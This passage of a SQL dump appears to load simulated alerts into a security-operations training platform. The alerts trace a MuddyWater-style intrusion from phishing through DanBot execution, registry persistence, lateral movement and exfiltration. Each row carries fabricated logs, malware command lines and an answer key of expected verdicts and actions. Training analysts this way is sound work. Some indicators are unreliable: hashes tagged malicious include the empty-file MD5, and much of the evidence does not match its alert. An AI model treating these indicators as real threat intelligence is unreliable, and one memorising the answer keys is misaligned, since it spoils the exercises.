2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1338, 'Unauthorized Access to Internal Network', 'high', 'Network Traffic Analysis', 'With persistence established, MuddyWater begins lateral movement, exploiting vulnerabilities to reach critical network segments. The attacker used stolen credentials to attempt access to sensitive telecommunications infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event\":\"lateral_movement\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"filename\":\"\\\\\\\\192.168.1.45\\\\sensitive_data\\\\telecom_infra.docx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"attempt_access\",\"outcome\":\"success\",\"related_alerts\":[\"APT_MW-001\",\"APT_MW-002\"]}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with MuddyWater APT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network segment.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User credentials suspected to be compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by MuddyWater APT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1339, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'The final stage of the operation sees MuddyWater exfiltrating valuable data, completing their attack chain and achieving their malicious goals. Data has been exfiltrated from the telecommunications network to external servers.', 'Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"event_type\":\"exfiltration_attempt\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.10\",\"protocol\":\"HTTPS\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"confidential_project_data.zip\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"result\":\"success\",\"detection_system\":\"DLP\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known data stealing tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_project_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_file_scan\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data archive being transferred 
externally\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1340, 'Suspicious Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting an employee with a malicious link. The email originated from an external IP and contained a suspicious file attachment.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"email_id\":\"f123abc456@malicious.com\",\"source_ip\":\"203.0.113.45\",\"destination_email\":\"employee@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"invoice_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_link\":\"http://malicious-example.com/login\",\"internal_ip\":\"10.0.5.23\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"f123abc456@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used in known phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware known as \'APT PhishDoc\'.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-example.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Phishing Database\",\"verdict\":\"malicious\",\"details\":\"URL is a phishing site attempting to steal credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Spear Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.836Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1341, 'Execution of DanBot Malware', 'critical', 'Endpoint Detection and Response (EDR)', 'Upon clicking the link, the malicious payload is executed, establishing a foothold with DanBot malware.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"process_creation\",\"host\":{\"hostname\":\"compromised-host\",\"ip\":\"10.0.1.5\"},\"user\":\"jdoe\",\"process\":{\"pid\":3482,\"name\":\"cmd.exe\",\"command_line\":\"cmd.exe /c start C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\danbot.exe\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\danbot.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"size\":204800},\"network\":{\"connections\":[{\"remote_ip\":\"198.51.100.23\",\"remote_port\":443,\"protocol\":\"TCP\"}]}}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure for DanBot.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as DanBot malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1342, 'Establishment of Persistence Mechanisms', 'high', 'System Registry Logs', 'The malware modifies registry settings to maintain persistence, ensuring it survives system reboots. The modification was detected in the Windows registry, where a new startup key was added pointing to a malicious executable.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"event_type\":\"Registry Modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value\":\"C:\\\\Windows\\\\System32\\\\malicious_executable.exe\",\"user\":\"COMPROMISED_USER\",\"source_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"file_hash\":\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\",\"username\":\"admin_user\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in persistence mechanisms.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"COMPROMISED_USER\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"User account activity indicates potential compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry 
Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1343, 'Credential Harvesting Detected', 'high', 'Network Traffic Analysis', 'Using harvested credentials, the attacker attempts to move laterally across the network to identify valuable targets. The activity was detected through unusual network traffic patterns originating from an internal system.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:32:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.15\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"success\",\"file\":{\"name\":\"malicious_script.ps1\",\"hash\":\"f4d7c3b2a5e5d8e2c8b5a5f6c3d2b4a8\"},\"protocol\":\"RDP\",\"user_agent\":\"Mozilla/5.0\",\"event_id\":\"4624\",\"description\":\"Successful login using a potentially compromised account.\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with credential harvesting.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f4d7c3b2a5e5d8e2c8b5a5f6c3d2b4a8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious PowerShell 
script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1344, 'Data Staging for Exfiltration', 'high', 'File Integrity Monitoring', 'Valuable data from compromised systems is identified and staged for exfiltration, indicating an imminent data breach. The attacker has aggregated sensitive files in a directory for easy transfer.', 'Exfiltration', 'T1074: Data Staged', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:48:23Z\",\"event_id\":\"FIM202310251448\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"username\":\"john.doe\",\"file_path\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\Sensitive\\\\staged_data.zip\",\"file_hash\":\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\",\"operation\":\"file_write\",\"status\":\"success\",\"comments\":\"Sensitive data staged for exfiltration detected.\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous exfiltration attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local user machine.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected associated with this user.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\Sensitive\\\\staged_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File created as a staging point for data 
